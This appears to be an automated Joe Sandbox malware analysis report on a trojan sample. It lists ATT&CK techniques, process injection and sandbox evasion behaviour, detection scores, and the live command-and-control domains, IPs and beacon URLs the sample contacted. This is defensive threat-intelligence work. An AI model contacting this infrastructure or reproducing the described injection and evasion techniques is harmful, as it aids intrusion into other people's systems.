          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385307 Sample: 4oItdZkNOZ.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 31 www.stkify.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 5 other signatures 2->45 11 4oItdZkNOZ.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\m9c3uhgbfqo.dll, PE32 11->29 dropped 55 Detected unpacking (changes PE section rights) 11->55 57 Maps a DLL or memory area into another process 11->57 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Contains functionality to prevent local Windows debugging 11->61 15 4oItdZkNOZ.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 33 aksharnewtown.com 103.86.176.10, 49698, 80 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 18->33 35 www.formula-kuhni.com 91.236.136.12, 49703, 80 WEBHOST1-ASRU Russian Federation 18->35 37 18 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 cscript.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          4oItdZkNOZ.exe31%VirustotalBrowse
          4oItdZkNOZ.exe14%MetadefenderBrowse
          4oItdZkNOZ.exe33%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll10%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.4oItdZkNOZ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.4oItdZkNOZ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.4oItdZkNOZ.exe.26a0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.cscript.exe.4784e8.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.2.cscript.exe.4f57960.5.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          alliedcds.com0%VirustotalBrowse
          www.yakudatsu-hikaku.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.formula-kuhni.com/hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA==0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.xn--ol-xia.com/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.recovatek.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n10%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py100%Avira URL Cloudmalware
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jabberjawmobile.com/hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py0%Avira URL Cloudsafe
          www.th0rgramm.com/hx3a/0%Avira URL Cloudsafe
          http://www.investmentpartners.limited/hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py0%Avira URL Cloudsafe
          http://www.stacksyspro.net/hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g==0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==100%Avira URL Cloudmalware
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ugonget.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          alliedcds.com
          		107.180.50.167
          		truetrueunknown
          www.tonton-koubou.com
          		163.44.185.226
          		truetrue
            		unknown
            www.yakudatsu-hikaku.com
            		118.27.95.215
            		truetrueunknown
            www.xn--ol-xia.com
            		81.17.18.198
            		truetrue
              		unknown
              www.jabberjawmobile.com
              		104.21.37.16
              		truetrue
                		unknown
                stacksyspro.net
                		34.102.136.180
                		truefalse
                  		unknown
                  aksharnewtown.com
                  		103.86.176.10
                  		truetrue
                    		unknown
                    www.formula-kuhni.com
                    		91.236.136.12
                    		truetrue
                      		unknown
                      www.stkify.com
                      		172.67.210.123
                      		truetrue
                        		unknown
                        ugonget.com
                        		34.102.136.180
                        		truefalse
                          		unknown
                          shops.myshopify.com
                          		23.227.38.74
                          		truetrue
                            		unknown
                            investmentpartners.limited
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.aksharnewtown.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.stacksyspro.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.th0rgramm.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.investmentpartners.limited
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.rainbowsdepot.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.recovatek.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.alliedcds.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.selectenergyservicestx.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.ugonget.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.formula-kuhni.com/hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7pytrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.xn--ol-xia.com/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7pytrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.recovatek.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7pytrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.jabberjawmobile.com/hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7pytrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                www.th0rgramm.com/hx3a/true
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.investmentpartners.limited/hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7pyfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.stacksyspro.net/hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q==false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.ugonget.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A==false
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.603524845.000000000095C000.00000004.00000020.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.tiro.comexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.goodfont.co.krexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.carterandcone.comlexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1cscript.exe, 00000003.00000002.605431320.00000000050D2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.typography.netDexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://fontfabrik.comexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.comexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      163.44.185.226
                                                                      		www.tonton-koubou.comJapan7506INTERQGMOInternetIncJPtrue
                                                                      104.21.37.16
                                                                      		www.jabberjawmobile.comUnited States
                                                                      		13335CLOUDFLARENETUStrue
                                                                      118.27.95.215
                                                                      		www.yakudatsu-hikaku.comJapan58649GMO-REG-NETGMOInternetIncJPtrue
                                                                      91.236.136.12
                                                                      		www.formula-kuhni.comRussian Federation
                                                                      		44094WEBHOST1-ASRUtrue
                                                                      23.227.38.74
                                                                      		shops.myshopify.comCanada
                                                                      		13335CLOUDFLARENETUStrue
                                                                      34.102.136.180
                                                                      		stacksyspro.netUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      81.17.18.198
                                                                      		www.xn--ol-xia.comSwitzerland
                                                                      		51852PLI-ASCHtrue
                                                                      107.180.50.167
                                                                      		alliedcds.comUnited States
                                                                      		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                      103.86.176.10
                                                                      		aksharnewtown.comIndia
                                                                      		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:385307
                                                                      Start date:12.04.2021
                                                                      Start time:10:01:28
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 41s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:4oItdZkNOZ.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@15/9
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 26.3% (good quality ratio 24.2%)
                                                                      • Quality average: 75.6%
                                                                      • Quality standard deviation: 30.4%
                                                                      HCA Information:
                                                                      • Successful, ratio: 92%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 13.107.4.50, 104.43.193.48, 104.42.151.234, 8.241.79.126, 8.241.78.254, 8.241.83.126, 8.238.28.254, 8.241.89.126, 168.61.161.212, 184.30.24.56, 104.43.139.144, 13.88.21.125
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, c-0001.c-msedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, b1ns.c-0001.c-msedge.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, b1ns.au-msedge.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      163.44.185.226cV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                      • www.tonton-koubou.com/hx3a/?wV=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTReqSIU/XUQ&PRh0iv=SPxhAX6XM2BTb
                                                                      AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                      • www.tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD
                                                                      104.21.37.16Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                      • www.jabberjawmobile.com/hx3a/?MFNTHp=zXaxujox&qJE0=cNQmpavBJYLVVCP9fHUFAARwayWBvklnexWKCJ+eyAi/y3hLwATMTxpWtlohHCqG6Zjd3Q==
                                                                      118.27.95.215cV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                      • www.yakudatsu-hikaku.com/hx3a/?wV=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ZPWQ3q+SwvL&PRh0iv=SPxhAX6XM2BTb
                                                                      91.236.136.12AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        23.227.38.74PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                        • www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8
                                                                        Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                        • www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
                                                                        winlog.exeGet hashmaliciousBrowse
                                                                        • www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
                                                                        36ne6xnkop.exeGet hashmaliciousBrowse
                                                                        • www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
                                                                        Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                        • www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
                                                                        giATspz5dw.exeGet hashmaliciousBrowse
                                                                        • www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
                                                                        IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                        • www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
                                                                        HG546092227865431209.exeGet hashmaliciousBrowse
                                                                        • www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
                                                                        Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                        • www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                        • www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
                                                                        0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                        • www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
                                                                        TazxfJHRhq.exeGet hashmaliciousBrowse
